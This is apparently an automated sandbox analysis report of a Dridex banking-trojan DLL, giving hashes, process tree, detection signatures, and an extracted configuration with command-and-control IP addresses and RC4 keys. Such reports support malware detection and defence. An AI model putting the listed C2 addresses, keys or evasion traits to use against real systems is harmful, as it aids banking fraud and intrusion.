Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Variant.Graftor.981531.21000.9246

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.Graftor.981531.21000.9246 (renamed file extension from 9246 to dll)
Analysis ID:	455752
MD5:	f3895703410910aa0ef2f7da6a12dd49
SHA1:	18a05909877ba997e3acda5426d5a28a4159c089
SHA256:	688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Found PHP interpreter

Machine Learning detection for sample

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6524 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6536 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6576 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["46.55.222.10:443", "104.248.178.90:4664", "173.212.243.155:7002"], "RC4 keys": ["TlzeoaANiJLtcEAzNS7uZ3KSSRK6oFpIoDHQ62eZwk", "DSZImon5Amvp18afhhpJ5slHb4KiGr7qCFcVbrMfqMAezKKzyK5CJx2kyEDS4LKI"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.390127958.000000006E2D1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.388937385.000000006E2D1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6e2d0000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e2d0000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e2d0000.7.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.0.rundll32.exe.6e2d0000.7.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["46.55.222.10:443", "104.248.178.90:4664", "173.212.243.155:7002"], "RC4 keys": ["TlzeoaANiJLtcEAzNS7uZ3KSSRK6oFpIoDHQ62eZwk", "DSZImon5Amvp18afhhpJ5slHb4KiGr7qCFcVbrMfqMAezKKzyK5CJx2kyEDS4LKI"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	Virustotal: Detection: 32%			Perma Link
Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	ReversingLabs: Detection: 23%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.397663740.0000000002E45000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.401275551.0000000002E3F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.397681729.0000000002E4B000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb? source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.401275551.0000000002E3F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: RRGTYY.pdb source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb5 source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb3 source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb! source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.397681729.0000000002E4B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.397663740.0000000002E45000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb} source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 46.55.222.10:443
Source: Malware configuration extractor	IPs: 104.248.178.90:4664
Source: Malware configuration extractor	IPs: 173.212.243.155:7002

Source: Joe Sandbox View	IP Address: 104.248.178.90 104.248.178.90
Source: Joe Sandbox View	IP Address: 173.212.243.155 173.212.243.155

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: CONTABODE CONTABODE

Source: loaddll32.exe, 00000000.00000002.324643149.000000006E58E000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Graftor.981531.21000.dll

String found in binary or memory: http://www.php.netD

Source: loaddll32.exe, 00000000.00000002.324532981.00000000015BB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6e2d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e2d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e2d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.390127958.000000006E2D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.388937385.000000006E2D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Found PHP interpreter

Show sources

Source: loaddll32.exe, 00000000.00000002.324643149.000000006E58E000.00000002.00020000.sdmp	String found in binary or memory: CompanyNameThe PHP Group2
Source: loaddll32.exe, 00000000.00000002.324643149.000000006E58E000.00000002.00020000.sdmp	String found in binary or memory: 1997-2018 The PHP Group0
Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	String found in binary or memory: CompanyNameThe PHP Group2
Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	String found in binary or memory: 1997-2018 The PHP Group0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2E9348	3_2_6E2E9348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2E0754	3_2_6E2E0754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2D846C	3_2_6E2D846C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2E1460	3_2_6E2E1460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2D1494	3_2_6E2D1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2DA52C	3_2_6E2DA52C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2E1D58	3_2_6E2E1D58

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 672

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Binary or memory string: OriginalFilenamesir_ehh8_12h.dll( vs SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal76.troj.winDLL@6/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6576

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER83D4.tmp

Jump to behavior

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	Virustotal: Detection: 32%
Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll	ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 672
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1	Jump to behavior

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.397663740.0000000002E45000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.401275551.0000000002E3F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.397681729.0000000002E4B000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb? source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.401275551.0000000002E3F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: RRGTYY.pdb source: SecuriteInfo.com.Variant.Graftor.981531.21000.dll
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb5 source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb3 source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb! source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.397681729.0000000002E4B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.407118640.0000000004E40000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.397663740.0000000002E45000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.406861516.0000000004CF1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb} source: WerFault.exe, 0000000B.00000003.407346883.0000000004E46000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E2DF6CC push esi; mov dword ptr [esp], 00000000h

3_2_6E2DF6CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: WerFault.exe, 0000000B.00000002.424826209.0000000004ED0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000B.00000003.422709638.0000000004A2E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000000B.00000002.424826209.0000000004ED0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000B.00000002.424826209.0000000004ED0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000B.00000002.424826209.0000000004ED0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E2D6D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_6E2D6D50

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Graftor.981531.21000.dll',#1

Jump to behavior

Source: rundll32.exe, 00000003.00000000.388018657.0000000002D00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000000.388018657.0000000002D00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000000.388018657.0000000002D00000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000003.00000000.388018657.0000000002D00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_6E2D6D50

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_6E2D6D50

Mitre Att&ck Matrix

